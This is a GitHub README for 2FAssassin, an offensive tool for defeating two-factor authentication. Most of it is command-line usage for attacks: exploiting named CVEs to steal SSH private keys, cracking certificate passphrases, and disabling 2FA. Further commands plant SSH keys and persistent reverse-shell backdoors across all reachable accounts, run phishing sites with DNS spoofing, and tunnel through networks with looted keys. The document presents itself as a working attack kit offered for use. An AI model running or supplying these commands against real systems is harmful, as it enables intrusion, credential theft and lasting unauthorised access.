sashka3076/2FAssassin
Folders and files
| Name | Name | Last commit date | ||
|---|---|---|---|---|
Repository files navigation
## Preamble ##
- Code changes from time to time, please do a 'git pull' before running the tool.
## Intro ##
- The effectiveness of the Two-Factor-Authentication depends on how well a user protects "something only the user has".
- The tool looks out for getting the OTP(s) and private keys using various methods.
- The private keys can be extracted from client certificates and cracked to be used for authentication.
- The tool exploits the common vulnerabilities that caused private keys leakage.
- Propagates the compromise starting from a single machine to the entire networks via looted private keys.
## Features ##
root@kali:~/2fassassin# python assassin.py -h
___ ___ _ _
|_ ) __/_\ ______ __ _ _____(_)_ _
/ /| _/ _ \ (_-<_-</ _` (_-<_-< | ' \+v2
/___|_/_/ \_\/__/__/\__,_/__/__/_|_||_|
usage: assassin.py [-h] [--target TARGET] [--silent] [--scan SCAN]
[--check CHECK] [--cert CERT] [--filetype FILETYPE]
[--user USER] [--user2 USER2] [--secret SECRET]
[--spoof SPOOF] [--gateway GATEWAY] [--mitm MITM]
[--host HOST] [--mode MODE] [--auto AUTO] [--post POST]
[--db DB] [--key KEY] [--log LOG] [--tunnel TUNNEL]
[--chain CHAIN]
Bypass 2FA - SMS, Voice, SSH
optional arguments:
-h, --help show this help message and exit
--target TARGET IP Address
--silent reduce output verbosity
--scan SCAN Network enumeration { basic | advanced }
--check CHECK Check for vulnerabilities, modules
--cert CERT Certificate management
--filetype FILETYPE Specify file *.extension
--user USER username
--user2 USER2 username2
--secret SECRET password
--spoof SPOOF spoof
--gateway GATEWAY gateway
--mitm MITM mitm
--host HOST server ip
--mode MODE mode
--auto AUTO auto mode for automation
--post POST post modules
--db DB Manage your trophies.
--key KEY keys management
--log LOG View logs
--tunnel TUNNEL Create ssh tunnel with looted private keys
--chain CHAIN The amount of connecting chain
## Example Usage ##
- Network enumeration:
./assassin.py --scan <basic | advanced> --target <ip_address | range>
./assassin.py --scan advanced --target 192.168.0.0/24
./assassin.py --scan basic --target 192.168.2.40
AUTOMATIC MODE
--------------
* Check everythings (common vulnerabilities) that cause the private keys to leak out.
./assassin.py --check auto --mode attack
Network Enumeration
+
| Building Target Database
|
v
+----------------------------------------------------------------------------+
|SSH-based Attacks |
|ShellShock |
|HeartBleed |
|Ceragon FibeAir IP-10 SSH Private Key Exposure |
|ExaGrid Known SSH Key and Default Password |
|F5 BIG-IP SSH Private Key Exposure |
|Loadbalancer.org Enterprise VA SSH Private Key |
|Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution|
|Quantum DXi V1000 SSH Private Key Exposure |
+-------------------------------------+--------------------------------------+
|
| POST Modules
v
Keys Extraction
+
| Looted Keys
|
v
Key-based Authentication
Manual MODE
-----------
* SSH-based Attacks to get private keys
./assassin.py --check ssh --mode attack
* HeartBleed Attacks to get private keys:
./assasin.py --check heartbleed --mode attack
* Ceragon FibeAir IP-10 SSH Private Key Exposure: CVE-2015-0936
./assassin.py --check ceragon --mode attack
* ExaGrid Known SSH Key and Default Password : CVE-2016-1560
./assassin.py --check exagrid --mode attack
* F5 BIG-IP SSH Private Key Exposure: CVE-2012-1493
./assassin.py --check f5 --mode attack
* Loadbalancer.org Enterprise VA SSH Private Key
./assassin.py --check loadbalancer --mode attack
* Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
./assassin.py --check array --mode attack
* Quantum DXi V1000 SSH Private Key Exposure
./assassin.py --check quantum --mode attack
* Check & disable Two-Factor Authentication
./assassin.py --check config --mode attack
POST MODE
---------
* Once you looted the private keys, perform key-based authentication to all targets in the database
./assassin.py --check ssh --mode auth
Certificate Handling
---------------------
#4
Remove Passphrase <---------------------------+
+ |
| |
| #3 |
| Parsing Cracked Passphase |
| |
Analyze Certificate | |
+ v |
| |
| +---------------------------+ |
| | | +
#1 +----------> | ^^^^^^^^^^^^^^^^^^^^^ | <---------+ Getting Passphrase
| PKCS#12 Certificate | { Cracking | Stealing }
| ^^^^^^^^^^^^^^^^^^^^^ | #2
| |
+----------+-----+----------+
| | keep for later use <--------+
| | :) |
| | |
| | |
#5 | | #6 |
Extract Public Key <----------------+ +--------------------> Extract Private Key+
+
|
v #10
Validate Domain #7 Authenticate to SSL Server <-------+
+ |
| |
v #9 |
Real Domain Hunting +----------------> Prepare Client Machine +--------------------+
#8 +----------------------------+ SSL/HTTPS
| Loading Client|Certificate |
+----------------------------+
* Look for potential certificate files (contains private keys inside!!!)
./assassin.py --cert analyze --filetype pfx
* Cracking PKCS#12 Passphrases:
{Dictionary Attacks -- using wordlist}
./assassin.py --cert crack --mode dic --filetype pfx
{Pure Brute Force + Mutation}
./assassin.py --cert crack --mode bruteforce --filetype pfx
* Dissect the certificate file + removing the passphrases + hunting for correct domain (target server)
./assassin.py --cert dissect --filetype pfx
* Preparing client machine + install cracked certificate + authenticate to SSL server
./assassin.py --cert windows --user <username> --secret <password> --host <client_machine_ip>
#2 Loads client-certificate
+-----------------+ +----------------+ +------------------+
| Attacker Machine| | Windows Client | | SSL Website |
| (2FAssassin) +---------> |(172.16.173.180)+-----------------> | (172.16.173.182) |
+-----------------+ +----------------+ +------------------+
Sends client-certificate, instruction script Authenticates to remote SSL website
#1 #3
Backdoor
--------
#4 {add keys}
'2fassassin' +---------> account_1
#1 +-----------+ |
+-------------> |create user| +---------> account_2
| #2 +--------------------+ |
sshkey +-------------> |generate RSA keypair| +---------> account_3
| #3 +------------------------+ |
+-------------> |access to remote server| -------+---------> account_4
+------------------------+ |
+---------> account_5
|
+---------> .........
* Add arbitrary SSH keys to all the accessible accounts
./assassin.py --check sshkey --mode attack
* Drop persistent backdoor (reverse shell) to all the accessible accounts
./assassin.py --check reverse --mode attack
Impersonation / Client Side Attacks
-----------------------------------
#1
Server certificate was stolen by attacker
+------------+
| Attacker | <-----------------------------------------------------------+
|(2FAssassin)| |
+----+--+----+ |
| ^ |
| | #7 |
| | reverse shell |
| | connects back |
| | to attacker |
| | |
| | +----------------+ (normal) +---------+--------+
| | | Windows Client | client auth | SSL Website |
| +-------------------+(172.16.173.180)+-----------------> | (172.16.173.182) |
| +----------+-+---+ +------------------+
| ^ |
| #4 | |
| SSL webiste is now | |
| at 172.16.173.194 | +-------------------------------+ #6
| | | client download
| | #5 | malware from the
| #3 +-----+-----------+ (abnormal) | phishing website
| DNS Spoofing | | client auth |
+-------------------------> | DNS Server | |
| |(172.16.173.191) | |
| | | |
| +-----------------+ |
| |
| +------------------+
+----------------------------------------------------------> | Phishing Website |
#2 Attacker cracked the server certificate, then use it | (172.16.173.194) |
to set up phishing website +------------------+
* Setup phishing website + DNS Spoofing Attacks
./assassin.py --filetype pfx --spoof <phishing_server_ip> --user <username> --secret <password> --target <victim_ip> --gateway <dns_ip> --mitm <on|off>
Tunnelling
-----------
* Create ssh tunnel using looted private keys (greater the chain value, longer the ssh tunnel)
./assassin.py --tunnel ssh --chain 1 --user <username> --secret password --user2 <username> --host <server_ip>
./assassin.py --tunnel ssh --chain 2 --user <username> --secret password --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2>
./assassin.py --tunnel ssh --chain 3 --user <username> --secret password --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2> --user4 <username4> --host3 <server_ip3>
Administration
---------------
* View activity output:
./assassin.py --log all
* See what (e.g., credentials) you've got:
./assassin.py --log loot
* Find out the origin of the SSH user:
./assassin.py --log whereis --user <username>
* Find out what SSH accounts are remotely accessible:
./assassin.py --log account --host <target_host>
Investigation
--------------
* Check if a remote host using key-based authentication
./assassin.py --check pka --mode detect
* Find out which machine hosting the user account
./assassin.py --log whereis --user <username>
* Find out what accounts can potentially be accessed by a specific user
./assassin.py --log account --host <ip_address>
## FAQ ##
- Error when launching network enumeration
Try loading the msgprc at msfconsole, and define the password (e.g., load msgrpc Pass=abc123)
- The user "2fassassin" not found when "./assassin.py --check sshkey --mode attack"
Try create the user manually:
useradd --force-badname 2fassassin
su 2fassassin
cd $home
ssh-keygen -t rsa
## Limitations ##
- Development Status :: 2 - Pre-Alpha
- Currently still under active development.
## Copyright ##
2FAssassin - Created and maintained by Maxwell Koh
This program is free software: you can redistribute it and/
or modify it under the terms of the GNU General Public License as published by the Free Software Foundation,
either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>